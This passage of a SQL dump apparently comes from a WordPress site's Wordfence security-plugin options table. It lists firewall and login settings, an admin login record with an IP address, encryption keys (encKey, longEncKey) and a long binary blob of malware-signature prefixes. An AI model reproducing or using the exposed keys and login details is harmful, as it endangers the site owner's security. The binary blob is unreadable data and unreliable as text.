:\"ct\";i:223921571;}i:4;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:185005241;}i:5;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:161965118;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:158863563;}i:7;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:121546515;}i:8;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:120733863;}i:9;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:119450552;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"8b83c4986d689e5c95d1bb380075372c40d749cde2b10a17c3acf146ff40cf3d\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1630285681','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','ed40efe59081a50d','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Mon 23rd August @ 10:12:56PM\";s:2:\"IP\";s:13:\"103.70.171.69\";}','yes'),('lastAttackDataSendId','8034','yes'),('lastAttackDataSendTime','1629498908.202819','yes'),('lastBlockAggregation','1629717525','yes'),('lastBruteForceDataSendTime','1627730371.792100','yes'),('lastDailyCron','1629717523','yes'),('lastDashboardCheck','1629717524','yes'),('lastFalsePositiveSendTime','1624464244','yes'),('lastNotificationID','205','no'),('lastPermissionsTemplateCheck','1629717564','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1629680873','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','2bc7404a9db8a0d5080c1a62d2fad303291d3a5921796a99a4d228dafb280dfe','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U� ��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��= ��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�: X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;.v����+�$� i�?�s� �+\n�� ؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y ��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r��� |hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq 8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A�� ����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X ���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5 �>� F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р� >\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0�� �s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0� VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_< -��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R �,� 5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L�� �\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k _�\r?~��ʷ̀�#G@�C�w�C\'�_� ��� �YЉ�[�����*�Z�j} �B��CE�T�9*�>*� Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/ t� UM_U�q��n]]M�B�G�k ��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r�� u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(� ����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k �|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q� ��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U �����\r��K�a�����g\r���\0^Yp� ژÁk���\Z��`>^=���E������}A�a�p�[���mሳY����p��y1 ����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g� gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p���� \"\n>�p>�>�� ������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub������� �%Ґ�u}��\\d��aȤc+{{ 2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^���� 2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ�� �R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ \\� ����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G� )X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3���� �_p�o�������(��\'\nu���: E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{ �S��[��뚌�|�.0��z� �{�zT�.�=\r�ђ�>�E�o���6����[r�k�DW4�E����������Е���+=�+�`te�>��ڄ�JnD����գo��/;�!cס�ޛѰ\'4|G,\Z��]k�]?�-�!x��\ZI8����\'�E7��\Z�i.B7��E7���/1hlc9�5e\Z�*G_� �S��_���/��[Sѝ�5h�Lc4����%Cw���nE\r��>�}��7n�o����5��wM1�@S�mBS�X���BS���G��Ѵ}Uh��z0V�f�|�f��@3�բ�l|��#���\nѬ1uh֭�hV�4g��M@s�\"М�X4�e(��a$z�d4����-�E����(F�3t�|��h~�4��=qFO��CO�m@X-ЎEƬCN�FO��BO{FO�?��$�%������Z�B�0�L�\rZ�t-�u-+�������G/�e�W�����\\���U���U���aNh5���rF�+��k�k%��{��k_����X�z�bZk�֮qBoR����^���z�v�(�Κ����}��}Wz?&\0}([�>\\��>�h�I��a�6��G���h�m�T�>��G��u�S���3}Vb��씢-���w�G��9���z���Or\"��5}5�}e݇�Z�}�}=� }=���Q(�nrm��\Zmc��OtE���D?��G;l�G/�c���,�v�}B?�߃~�<�\Z�~i�F�jMF��_D��F���F��\rh���u���ȣݣ���C��s�ў���/�ץ��F�t�B�����C�!S�T�o֍�G�@�3�����\0R���O0�\Z����cX{������_~?\r#�]0��;��v�D�yLl���}�0�lLb`�I��b��w1ن����Q�y�qS\Z�ĸ32�/?��j�b��N�z�-L}�S��a��S��O�5����i�b�U�0�� ��Ssl�n�{ Ӄ0��?1��W���I���H���SlhB\"6,~\r6�[fZ�\r�/��_����*�F����[�O��5���/���� ̴&c��/k�{�663\Z[�g��T�Y�,�1��l��Ll|�-6a� f3�/f3�f˿�l�1ۨ��������$�6��6i���Y�MY�M)��9�a�m���a7���C�i�6�;�2s�Ha�?����،#��Y5 �&�ܨc��n̝s���gbs�+������ߞؼ�7ؼo?��6�q)�\0��-h��<�as�1��=����g�R����[�S�y��Ńa�������%?�`>�K�e��a�&]���b+z���!�����tލ�|5|q|{[5e4���:��\\��g$Bta!�����X����L�ª�`�g���ᳱ�uغ��u�؆ǽ؆g�\r_���]�X��X��Xtq>��܄m��m�mN8�m>t��۲��=����Ƕf����Z��I\rX�x�p=��K���m��a�U��*����x;K�%ݷ�v��Œ�Yl����b��plϔ5؞��ؾ���Ik��LK=i���.�\'`��ð���X�����4,3x\rvh���찏?�e�˺n�e�b�i4�c܃��;�N��-��:���c����<t�\'��婶byw\r�|h!v�; ��N���?�\nDc��-��t�`E�qX�u.�&�3��ؙ�u���,V�JNJ���-!Xɡ�XI�e�\\�F�t�9���+���J�i��꿼%��D��u��!%V������*n�*���KZ�إo[��z�ؕ/Xe�n��;�]�f��?n`�mO�k\'7b�\rcח�b�o.���\r�jb��={����\r�U�\r�c؍;؍�X-7\r�}������ �]=����!��:�Z����%��ѵX��9X�%�5B_�\'�]Xs�%�lt�,<k�V���2�Z��X�3����b���c/Wb//Ea��-��0[��7�w�����g�}o���>��ľ*����X��j�+{2�]���,�~G��ҰQY�/,��\\������vZ����?N����#���H�o�B������,��܇;q�������\0G<�q\\�\'M\'��q� \\rk.��ҟSq��hj�Y�h��ӊs��qu�F\\(݂kt��\Zc�m��k߶�5�:��:�p�\rJ|��>d�5>d�[\\�R���z۾�z{�p��6�~�]���i���B|��>��V��Gtō��q~n��nrt=>*�<>�D%>��M���O�t`�]���8��ռ�͇|��m���,n�m�[���p|l�;|z\n�<����Oŭn���u���=��w8�v��\'T��mln�6�z���[�M�-n� ����]7�v�zp�w�����`k|J�O�?w[�;M���;Mq�#\r�Ԙd|jZ��݅O���;��]��K�>�0�n������0�g��g�E��\0O|Vw%>;�\Z>��7�n����,>��5��>_�e/����y���[�/�؏/|�\n_�q�z�{u�^\Z��0�vƽ/V�>ǃq�O���K�R�6|��2�����\n�)���S���kp�\'^�ʐ�x >_�%_�5z� �i��^p_�p4:���}_�����ã��Oj�{3�O��u���:u:�a�y|�� x�uxd�<�xYa�G��7\ZN�7�Gs���?1�&�5x��g<&��y�\Z�i��o��|��ee4���6|��qx�j|���zi(�m �����^��4���t<���a<�6|G�G<�5�s�|g[%�����;O�u��W��2��:��2�h���5|/��ﻢ��?�O ��Sҏ�Z��TO-����xz�&��~~0x%�1E�g,��3�� ����OxfC<~ȁ�-X�d���jO��/�ŏx�ŏ\\{�y4�E��5�۞�� ��ʇ�ɠ9��T/?/�Z�\\?����৭��wO�O�i���Ow�ƋػxQ��]n����b�\"�x�m�������a_���e�y�?~��?� ~��+�|\"�_��_v��_� Ư,}�Wj���V�U%3�x���x��>�:�~��=~m�0��yc���[���j���\\���8�51���9,~SӉߜ��o�X�w5;�C��s����Cx�pk���!~��o���P��,8� ��8���e.x�*o��𦵾x�f�i��T��7ݚ�7�1��,�X�?��?���:��l��7�[���/q�_�����x��u�-���N\0��q��ױ��q)��t[W���.�ߗ<���?<�;|�Y��m���z/�϶3��gS�/M�g7�_{,�o��o���k��]�\Z���.�gw6�ê�q���f���k�{7xo�a�\'i��������]����>Պ�~х����?&[��߁�x_���;�*@��1�_������r|��A�_G��0Մ\0K)zw�@�?��@v�����0���N?�B�h�04\'�-0!���$d)�Ur��w$�&;�Cl�g��7��p]����| >b/���*^�Pe��0�0�y}��\Z�Ch%7ڃf���_w����`b\"1x�b�h11DaC�}%�\ZD,aP3�Z��VSE� \"�� ��;N�x�K�$�#i[b�H#���C�x�U�Dv�01�!F�F�ѫ>��i�Hb��EbLT\'a��DX�{NX|�N��~B�������|K�/��y\"a9O��|�OX~]IX�|$��� �� ��� �/1��a����A�})%� ��΄��nbʃ/Ĕv�C�%��IL�wS��SW�N6���#�ӷQĴ� g�넳�+�\\H�\'\\FU.%,��1#p=1h&f��E�\"�Y\'r 7�I�۳�ۛ��ɀp�v\"%� Ĝ���pb����T�[��� �6�S/��t]Nx��$�����/�c����X<=�XbA,~����J,��$|�W��|���X*�#�f� ��K��K��\"�t��; �\"�)�X9d\Z�.�l�H�k�5ïk�̈5��� �D�R#\"���$��fO��� �R�:v��XKl�\\DD�WQ?k��E-Ħ�@bAl�>Nl�2��]1��ݿ��Zt�ضÜ��N�=o&�������D��ED�d5�4̄H:<��&v�F�#��ݏ�=6��=������SL�\'܈�+܉��ډ�)=D�c��6�8��8p�-q�L�f��H��D��F���#������yDz�a��Տ�!��8dHr�\'�`k\"�4��i��#�e�������ܡ���\'��Z�������o�D�f��s��_<�8��DdcD���#DѴ�D���(\n<Ou�g�AD�K�(u\\B��O��7[�O�\'.��&.�ڏe��D���WJ���r\'����(?���辒�X�M\\|�\'.�!�*�)Q��Quh(Q�����d��`F�W7�\\��p Q{ً�9}q�&��ekEܺB�>����BM�gN�Y�O܉xCܩ_A���M�cN�\'�Mk���)�}���w�r)�`�\n�⡍-�oQ����7��oL&\Z��DC�\"�Q�;�Ԛh|YL<Y�A<�I<� %��!�-̈gCY��9k�e�q�%-�xA���@��$���xx�x�y���������O|\\F�D����ԽEt.J|�6#>��Ӵ�o�i�7�l�KGt��\'�|���Ӊ��w���3D�H�@������op�G�����ӫE��{}?~�ӟ��S��>1�p�x.%��/H�� a�h.V���Z� 1q���#q��/�AGW���s$ ���9�8����6�r�S$�֏��= B8I?�#�3��?�d\Z�Hvh)ɾB��y$簞�X�\\i3�:�T��!�)<�Oj�=!5N�Z�$R�\r�5�9�ZI�\Z��މ���$��/�%���\"\rRQ� ݚ4�+\'�-�A��HC>�4�O���}\Z9b�r��Nrd�0r�!���i��I��i|c:i|k7i\"M�F�&��H�2\'�<si�֑c\'_%ǥ+I�ѣH+�Xr�d9^J���K�lYO�6&m�� mg����oH�5���D9�UM:�yI:��%1�q;HN�YDN�%���MN��FN˯#�w�Ω^��KN�I׳��W�I���Hw�c�{S���#i&�LyD�)�Nέa�y��<��g���4ҳ���d��ą\\d�D.*\'��<H�䳤ס�����}�b߿����g�Z�W�N��!}����c�ҵɥ {ȥ?-�eeKI?ă\\fN.�@��C��N�hM\'�]�ɀ�ɕO�����:r��䪿��`�?�j#sr\r�B��\r C\"2��w2�ʜ�����2\"4��(|L��/%�>�&ו��u���G�Lf�>O##GF��n�dd/FF�S�(�K��u�ȍ1��h�2:y4� �#7��Jn��On*~Fn�lDƬLƴ-\'7�;DnNYOƙ�\"�m$J��č�d�ǟ�5�ɤ_dR�7�3$���d�drNr7���#&�ɳ��B���d���-�Εd�=r��9�)���@f�U�Y��dV+��n\'�S��<�RF���c/=�\\��\r�K�^}H�E���k:O�˴�N\n�d�+Y�$Rk���#�Ӽ-y�D\ZY�� ��~&�<�!�-F��`#�ynZ\"y�Y��C^�M!/�m\'�&\'˶=\'�l����r�J�<|-Y~�=y1MNV���KZ:䥩/�J�Gd��=y�`y��Y=�5Y��IV�o!��:�\"%y��X�f�+YS�Jֺe�7�N�7�k�[����M��<$��{K>pJ\'\\t ���Cc���ai���U��{1�8M�l�-&�n�M����.���K��o{�\'kޓO=��fY*�l�O6O� �Wo!��z�g���g���g_Ed˟���R;�����6d��5��|S��|�=�|;��|��|[��n�!��\'ۯƐ����k��5=����ò���0���QD~6?D~��N~9���RJ~[�����]�F��x�]�Mv?u&{r��^��h�_�J�W=@���D�b�?-ɿV{Ⱦɿ�~����(�����=\"p�U�R.��d��m\"TvPDL��>\"���Hlc.�z+{��k(�|�8���Q�X�F�xK�h�\"fZ���u��oD����\"���\"��f���ע!;4�!�BD��H�ޝ_\"�g�\"����a�\rE�G&�F:o;���/2~�/\Z�A4vm�hܰѢqwA�xH\"\Z?\\#�6�!��<Ed\',��M��M.s9��\"G��\"ǖ]���Ѵ3�E��D.������D3�D�f���.�#ro=&���,�;s�hޠ��yCψ�r�yg�<NOyt��Z�-�(ZT����gh��oF�|2)�O��ȧm���c�h���o������h�\\sъ�?\"���7E+�lD+?��c�EAC/��T�¾6��o.�w����\'Z{�V����hCP�hC�ц*R���^ѦnGQL�B�9��h��x�(��B�x��( >+��yR���H���h�����4����D)!٢����W���Nj����sg�>>/�0_+���-�x�&:4�Ht(c�(�B�(�)T�#d��HmDGM\rEG�:DG�>�r���n!:��(��Q�;щ(mQ�h��p�ZQѲ����zQQ�P����� ��k�D��D���JF�J�f�D�D*kEe�V�ʂD凵E�gBD�3E��DWf�U&鋮n�U��D�]��Pt�n��F�#���,��Ɖn~��28.��݉4�Y������E��Q��vQC�R�h�OQ�讨)�X�T0A�8K*z�q5+5\'E/b�E/�^�NX.jm�,zy^�z�,j��)z3h��M��[�\n�;�4Qǖ���D���>/[(������BїD��䑢�g�E����E]��D�7x�����(����o�}Q�&��߃6ѿ��b�J,F&U�Q�1��(&���]bQ��X�%K��˶��eّb�l�X��],�8-��2��X1�\\�?��=ż�\"��d�X��F���V���G�����JT<t�5�P� bC�C<|��xD�\\�����#{x�Q�\r��c�Y�V�Y���j��ت�C<��N��Ubk�Pl�Tl�$���X<�/Wl��J<�@�?�S�;��z�b�6b����O��.�����e�l�t�f��`�ص�P<kU�xֳ/b�=b���b��$�����9���]k��T�=�b���ۗ��-^��P���K��Fk��E��K;։����W�m���A�_�)����Ł+~�WI�ūj����8��tD�Cg���4��έ���fq�u�x����M�v�M���c�q���x��\\����-���qjSq<tC��$�|�� �����\Z���wz4��K��{!�ޖ.�ޟ�ũQ��j�i���Ӓ��kO�>Jg�gi����֟�#마�w_��>�]\\,>�(.���*>e(.{G\\ء�9���nr�nĥo։�ƒ���C�/�}W*Wĉ/{�/o._��#�R�+�ڔ ��;!��m-��H|��qq����V���[Cķ���w�n�9�U|w�����(~��P��%~�c����hq�%\'n�w7�M7|�7\n�ō[�M�:�\'���`q���[��73�/���_4:�_������ŭ��6�G�-���Ƈů���7���M��;�������i����x��+ğx����)��kş������d��o���[]w�V�{��{>6�l���?:ſ�X��&��AK�������\Z$��r �.���K��%x�c ��XB> !Z7HHi���X\"\"~HD�$�[�%bm=���(�]�0A\n {�O�r�(Q�s���� ����d�\"�d�2�dІ\'��F��Ɲ�x[�n�6�^��D� ������]%C?���[\"1<m.No������sIb�{Eb����X2ꌣdT�Q�h���d�d����%��=��������$�G;I&��Jl�^�M�����l�]�3�}��d���ွ�q�\'�T#B2��L�4<N�t��ĩa�dZ���Y�Ĺ����dF,���df�nɬk �I.���wK�`$�d��$~C����J�GU�d�?�b�g����$�KgH�_6K��I��DI��<#Y�<X�$�[��+�Z%Y�͐��!�o��Lϑ�8IV���\\�J�n���\'Yg+ z\Z( zM�fe�d�뽒5?�%!��%a�֒��$I��{��G%�Iă\n�Z�,ɺ� �h|�d�\0I6�����x\"�um�l��J�^m�l�+I�&�iGHv��K�O�H�x{H���\"�;��do� ���%��J�ǙHR}�HL���͐��}-�P�K2I��r�l��$��Q���Prt�Xrt�b���L��WI�\\�e�ܽ��ŀ$�i� }7ɉ�풂�S�S�HNeސ�:�Lr��!�ٙ�$�>�I��%�n�$�>*I��U���%e+�$e]��\n�T��\\��_R��Hrm���^�[�o%wxS���%u�:�5��]�{�s%�v~���X�w��Q�9I�%��vђ�ےg�%�#s%ϯ�H^� y��K�b�Iɋ��ˣ�����%��\r��ݳ��=씼��,y��I�ﳔ|0�|�^J>Ŭ�|�WK>7��|���|��&��3H�m�Hɷ�c���$�o��tk�Jz�T��;��3K%?�GI~<(��m+�*xzI\n٭�BSl�0u]���I i�T$K��O$KeC����R��ER�/I�^���\\��;-՚(�ZuK�m�X:\"w�tD�?�ȩ��#�äF�¥&`�t�K:J�!5�t̆*��k�f���f�{������R��/�.W�wJǎ����I:6�P:��Uj͍��$��ڴ�Img���6<���H��v߂��F�K\'���ڏ�#�V,���J���S-B�S[�J�fܗ:e�N��i���\r����Jg�:*u�v��礳����G���q�)��TJ88K=��)C�-FH��̥�O�R�d�Ի�O���)�m,]v8P�\'�����)���&�K�-��\Z�����0Ĥ����U�6K��Z���&i��9i�����\"i�{�4DV#\r�,\r�JCu�IC#>H�^n��u������F\Z}�F:�ҨS�1�^I7�I�Mɔ���҄�;&H���&WJw��.���]���]�\"��m�I�?ɔ����\\���֔J�W�K3�͐��fՌ�fߴ�u� =z���w�I]\\z��3i�*=5��l��l}�����ܺ��cii\'�T�-��TZ�&���!��\'�Kz����փ���f��;K}�u�qҺ��{p��ޥp�a��N���f��G+\"��5Q�ƺ�Ҧ ��\'sNJ��ߔ>��Q�����i�%i���疑��ofH_z�Iێ�J_[����%}kH�v�K̗߭���~� �ؽM�y%B�i�Z�Y�K��6X�ua���?��T��{�ni��_Ү\"�eC��i�Fߕ��/��*�!�Gڏ�G������/2�J�~<H������e�3s~AK&�I����D\\.���eҀ-2�i�L~P��R/�ϥʘrL�bd�K��u?.c�ۗ3d�O��q�2�v�L���L;v�lP�t���8�`t�lpc�L7�L�j��l�lh���0�D6����V��x�M� rG6�5��>����$35��>��=L�Y=�#[�,w�Zf��� JG���p���|�}�h��|�lJ�\'�c�H6m��l�I��u��l�e���d�*@�[�B�<�D6y,���$�?>L6�\'E��F�9�X��Z�0��{�v�w�6��b��H��\Z �ÿ��ɖo�+�m���_���<�d�\rͲ����gd�dk�:�uK�dd��?e3�e�;ɢɢO��6�.�Ŭ�/۲u�,�0Y��(�v�]g,�\'�e #�e ˶{x����wN��D�T�K��]���R�g�z��a�d{�\ne�}���)�����.;��Bv� ;X�\";X7D��;L��\'Yv�=U���#9��cV~�c{]e������>���e��e����\n�<��ܕ��&;c�(+���\\ ;7���gmم�0Y����� ��K��s�Wv�.Pvœ�U��ɮ��j���n���z�dw�\'�ꂞ���Z���e�������ϔ=l� 